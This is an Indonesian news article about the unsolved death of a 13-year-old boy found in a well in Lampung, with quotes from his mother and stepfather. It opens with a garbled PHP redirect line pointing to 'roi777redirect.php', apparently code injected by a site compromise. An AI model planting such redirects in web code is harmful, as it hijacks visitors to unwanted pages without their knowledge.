header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Penyebab Kematian Danu Belum Terungkap -
Penyebab Kematian Danu Belum Terungkap

TRANSLAMPUNG.COM, PANARAGAN – Kematian Danu Prayoga (13) warga Margomulyo RK7-RT24, Tulangbawang Barat (Tubaba) pada Senin (11/12) sekira pukul 13.00 WIB, masih menjadi misteri.

‎Hingga kini, penyebab kematian remaja yang jasadnya ditemukan tidak bernyawa di dalam sumur, perkebunan sawit milik warga Tiyuh Mekarasri, Tulangbawang Tengah, belum terungkap.

Sebelumnya, Danu berangkat dari rumah untuk mengikuti belajar kelompok bersama teman-temannya, Kamis (30/11) sekira pukul 14.00 WIB.

Suryati (40) ibu kandung Danu menuturkan, korban tergolong anak yang penurut, rajin ibadah, pendiam dan tidak berulah, baik dalam keluarga maupun terhadap tetangga sekitar. Dia menduga kematian anak ketiganya tersebut murni pembunuhan.

“Setelah dilakukan pemeriksaan luar oleh pihak RS Menggala Tulang Bawang, jenazah anak saya langsung dibawa pulang d‎an dikebumikan malam itu juga di TPU,” ujar dia seraya berurai air mata, di kediamannya, Rabu (13/12).

Dari keterangan orangtua Suryati, pada tubuh korban ditemukan bekas luka di bagian perut sebelah kiri, batok kepala retak, dalam celana korban didapat ceceran kotoran air besar.

“Saya pastikan sebelum meninggal korban dianiaya terlebih dahulu oleh pelaku. Selanjutnya barulah dimasukkan ke dalam sumur. Kami berharap pihak kepolisian segera menangkap pelaku dan diberi hukuman yang seberat-beratnya,” pinta Suryati.

Sedangkan ayah tiri korban, Supriyatna (45) mengaku tidak tahu persis kejadiannya, sebab dia sedang bekerja di salah satu perusahaan swasta di Kabupaten Lampung Tengah.

‎”Setiap pagi, Danu berangkat sekolah berbarengan dengan saya. Saya bekerja di BW Mataram, Lampung Tengah,” kata dia.

Saat pulang sekolah, korban dijemput ibunya, karena sang ayah pulang kerja pukul 16.00 WIB.

“Ketika saya hendak menggunakan motor,‎ istri saya mengatakan jika motor sedang dibawa Danu sejak pukul 14.00 WIB,” jelasnya.

‎Aparat kepolisian masih belum dapat memberikan keterangan, dari hasil penyelidikan yang mereka lakukan atas kematian korban. (dir/rus)

News Reporter